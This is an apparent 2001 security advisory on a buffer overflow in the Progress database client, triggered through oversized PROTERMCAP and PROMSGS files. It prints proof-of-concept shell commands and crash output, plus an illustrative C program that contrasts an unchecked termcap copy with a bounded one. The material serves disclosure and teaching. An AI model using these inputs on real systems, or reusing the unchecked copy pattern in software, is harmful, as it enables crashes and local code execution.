Progress TERM (PROTERMCAP) and PROMSGS Buffer Overflow Vulnerability

Published: 2001-10-10
Updated: 2001-10-10
Severity: High
Threat level: Local administrator privileges
Error type: Input validation error
Exploit method: Server mode

Affected systems

Progress versions 8 and 9

Details

Progress is a commercial database. The Progress client reads its terminal-capability file and its message file from the paths given in the PROTERMCAP and PROMSGS environment variables. Overlong strings supplied through either file crash the Progress binary and overwrite memory, which can be used to execute arbitrary code.

Test code

Create a terminal entry with oversized capability strings and point PROTERMCAP at it:

[root@linux dlc]# echo "v7kf|version 7 key functions:\\" > term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# export PROTERMCAP=./term

There are a few ways to set this off. One is to make use of a bug in the PROMSGS handling. Here is the standard promsgs error for a bad term:

PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
Unable to use your terminal. Check your PROTERMCAP file. (443)
** Could not find terminal type xterm in file ./term. (146)

Now replace the message file with 9000 bytes of filler and start the client:

[root@linux dlc]# perl -e 'print "A" x 9000' > /tmp/promsgs
[root@linux dlc]# export PROMSGS=/tmp/promsgs
[root@linux dlc]# bin/pro

[PROGRESS ASCII-art banner]

Progress Software Corporation
14 Oak Park
Bedford, Massachusetts 01730
781-280-4000

PROGRESS is a registered trademark of Progress Software Corporation
Copyright 1984-2001 by Progress Software Corporation
All Rights Reserved

PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
Error formatting messaage 96. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
Error formatting messaage 146. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 443
Error formatting messaage 49. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 439
Quit (core dumped)

The second way uses the termcap file alone. Append oversized ce=, cl= and cm= capabilities to the same entry and select it with TERM:

[root@linux dlc]# echo :ce=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cl=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cm=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :ce=`perl -e 'print "A" x 9000'` >> term
[root@linux dlc]# export TERM=v7kf
[root@linux dlc]# bin/pro

[PROGRESS ASCII-art banner and copyright notice, as above]

PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
SYSTEM ERROR: strent request for more than 32K. (893)
Quit (core dumped)

Solution

None available yet.

Related information

KF (dotslash@snosoft.com)
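As an added illustration, not code from Progress or from the advisory's author, the C program below shows the pattern the termcap test case exercises: a termcap-style lookup that copies a capability value such as ce= into a fixed-size buffer with no length check, next to a bounded version that rejects a 3000-byte value of the kind the PoC's term file supplies. The real PROTERMCAP parser is not public, so the 64-byte buffer, the entry string, and every function name here are assumptions constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CAP_BUF 64   /* assumed fixed-size destination; the real size in Progress is unknown */

/* Locate the value of capability `cap` (e.g. "ce") in an entry of the form
 * "name|description:ce=...:cl=...:".  Returns a pointer just past '=' or NULL. */
static const char *find_cap(const char *entry, const char *cap)
{
    size_t n = strlen(cap);
    const char *p = entry;
    while ((p = strchr(p, ':')) != NULL) {
        p++;
        if (strncmp(p, cap, n) == 0 && p[n] == '=')
            return p + n + 1;
    }
    return NULL;
}

/* Length of a capability value: up to the next ':' or the end of the string. */
static size_t cap_len(const char *val)
{
    const char *end = strchr(val, ':');
    return end ? (size_t)(end - val) : strlen(val);
}

/* Vulnerable pattern: the value is copied into a fixed buffer with no length
 * check, so a 3000-byte ce= overruns `out` by thousands of bytes.  Kept for
 * comparison and only called below with a value that fits. */
static void get_cap_unchecked(const char *entry, const char *cap, char out[CAP_BUF])
{
    const char *val = find_cap(entry, cap);
    if (!val) { out[0] = '\0'; return; }
    size_t n = cap_len(val);
    memcpy(out, val, n);          /* no bound on n: this is the overflow */
    out[n] = '\0';
}

/* Hardened version: refuses a value that does not fit in `outsz` bytes.
 * Returns the value length, -1 if the capability is absent, -2 if too long. */
static long get_cap_checked(const char *entry, const char *cap, char *out, size_t outsz)
{
    const char *val = find_cap(entry, cap);
    if (!val) return -1;
    size_t n = cap_len(val);
    if (n + 1 > outsz) return -2;
    memcpy(out, val, n);
    out[n] = '\0';
    return (long)n;
}

/* Build a constructed entry in the spirit of the PoC's term file: a normal
 * cl= capability followed by a ce= value of `pad` 'A' bytes.  Caller frees it. */
static char *build_hostile_entry(size_t pad)
{
    const char *head = "v7kf|version 7 key functions:cl=\\E[H\\E[J:ce=";
    size_t hl = strlen(head);
    char *e = malloc(hl + pad + 2);
    if (!e) return NULL;
    memcpy(e, head, hl);
    memset(e + hl, 'A', pad);
    e[hl + pad] = ':';
    e[hl + pad + 1] = '\0';
    return e;
}

/* Result of the checked lookup for `cap` in an entry whose ce= value is `pad`
 * bytes long: 8 for cl, -2 for an oversized ce, -1 for the absent cm. */
static long checked_result(const char *cap, size_t pad)
{
    char buf[CAP_BUF];
    char *e = build_hostile_entry(pad);
    if (!e) return -3;
    long r = get_cap_checked(e, cap, buf, sizeof buf);
    free(e);
    return r;
}

int main(void)
{
    char buf[CAP_BUF];
    char *entry = build_hostile_entry(3000);
    if (!entry) return 1;

    get_cap_unchecked(entry, "cl", buf);              /* fits: 8 bytes */
    printf("cl (unchecked, fits): %s\n", buf);
    /* get_cap_unchecked(entry, "ce", buf) would write 3000 bytes into 64 */

    long r = get_cap_checked(entry, "ce", buf, sizeof buf);
    printf("ce (checked): %s\n", r == -2 ? "rejected, value too long" : "accepted");
    free(entry);
    return 0;
}
```

The checked variant is what a termcap consumer needs: the value length is known before the copy, so the decision to reject is made on the source, not after the destination has already been overrun. Note that the PoC's term file also appends unnamed ":AAAA..." fields; a parser that scans past fields it does not recognise must bound those too.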